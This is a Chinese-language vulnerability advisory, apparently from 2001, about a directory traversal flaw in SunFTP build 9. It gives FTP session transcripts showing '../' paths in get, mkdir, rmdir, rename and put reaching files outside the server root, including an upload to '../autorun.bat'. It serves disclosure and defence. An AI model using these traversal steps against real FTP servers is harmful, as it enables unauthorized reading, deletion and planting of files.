20CN网络安全小组 - SunFTP 存在可以打破root目录权限的弱点

您当前的位置 >> 首页

SunFTP 存在可以打破root目录权限的弱点

/ns/ld/softld/data/20010306125842.htm

SunFTP 存在可以打破root目录权限的弱点

简介
SunFTP存在一个允许攻击者用相关路径打破权限进入root目录.
此弱点可导致攻击者得到系统文件.

详情:
易受攻击系统:
SunFTP build 9(1)

使用get命令:
从root目录外部拿文件:

220 chris FTP Server (SunFTP b9) ready on port 21...
Benutzer (10.17.3.44:(none)): test
331 Password required for test.
Kennwort:
230 User test logged in.
ftp> dir
200 Port command successful.
150 Opening data connection for directory list.
drw-rw-rw- 1 ftp ftp 0 Feb 28 13:46 .
drw-rw-rw- 1 ftp ftp 0 Feb 28 13:46 ..
-rw-rw-rw- 1 ftp ftp 0 Mar 02 11:21 test.txt
226 File sent ok
FTP: 179 Bytes empfangen in 0,00Sekunden 179000,00KB/s
ftp> cd ..
501 CWD failed. No permission
ftp> get ../sunftptest.txt
200 Port command successful.
150 Opening data connection for ../sunftptest.txt.
226 File sent ok
FTP: 1443 Bytes empfangen in 0,00Sekunden 1443000,00KB/s

使用 mkdir命令
在root目录外建立新的目录是可能的,而不需相关的权限.

ftp> mkdir test
550 '/test': can't create directory.
ftp> ,b>mkdir ../test
257 '/../test': directory created.

使用rmdir命令
在root目录外部删除空文件夹是有可能的.

ftp> rmdir ../test
250 '/../test': directory removed.

使用rename 命令
在root目录外重命名文件是可以的,并且也可能从外部copy文件到root目录.(...听起来不错)

ftp> dir
200 Port command successful.
150 Opening data connection for directory list.
drw-rw-rw- 1 ftp ftp 0 Feb 28 13:46 .
drw-rw-rw- 1 ftp ftp 0 Feb 28 13:46 ..
-rw-rw-rw- 1 ftp ftp 0 Mar 02 11:21 grmbl.txt
drw-rw-rw- 1 ftp ftp 0 Mar 02 12:17 test
226 File sent ok
FTP: 240 Bytes empfangen in 0,00Sekunden 240000,00KB/s
ftp> cd ..
501 CWD failed. No permission
ftp> rename ../sunftptest.txt movedtohomedir.txt
350 File exists, ready for destination name.
250 File '/../sunftptest.txt' renamed to '/movedtohomedir.txt'.
ftp> dir
200 Port command successful.
150 Opening data connection for directory list.
drw-rw-rw- 1 ftp ftp 0 Feb 28 13:46 .
drw-rw-rw- 1 ftp ftp 0 Feb 28 13:46 ..
-rw-rw-rw- 1 ftp ftp 0 Mar 02 11:21 grmbl.txt
drw-rw-rw- 1 ftp ftp 0 Mar 02 12:17 test
-rw-rw-rw- 1 ftp ftp 6 Mar 02 12:33 movedtohomedir.txt
226 File sent ok
FTP: 314 Bytes empfangen in 0,00Sekunden 314000,00KB/s

使用put命令:
当在root里有一个可写入目录, 在root目录外放置文件是有可能的.

ftp> dir
200 Port command successful.
150 Opening data connection for directory list.
drw-rw-rw- 1 ftp ftp 0 Feb 28 13:46 .
drw-rw-rw- 1 ftp ftp 0 Feb 28 13:46 ..
-rw-rw-rw- 1 ftp ftp 0 Mar 02 11:21 grmbl.txt
drw-rw-rw- 1 ftp ftp 0 Mar 02 12:17 test
-rw-rw-rw- 1 ftp ftp 6 Mar 02 12:33 movedtohomedir.txt
226 File sent ok
FTP: 314 Bytes empfangen in 0,00Sekunden 314000,00KB/s
ftp> put
Lokale Datei c:\test.txt
Remotedatei test.txt
200 Port command successful.
150 Opening data connection for test.txt.
226 File received ok
ftp> put
Lokale Datei c:\test.txt
Remotedatei ../autorun.bat
200 Port command successful.
150 Opening data connection for ../autorun.bat.
226 File received ok

解决
这已经是个作废的东西了,我们建议你换个其他的FTP Server.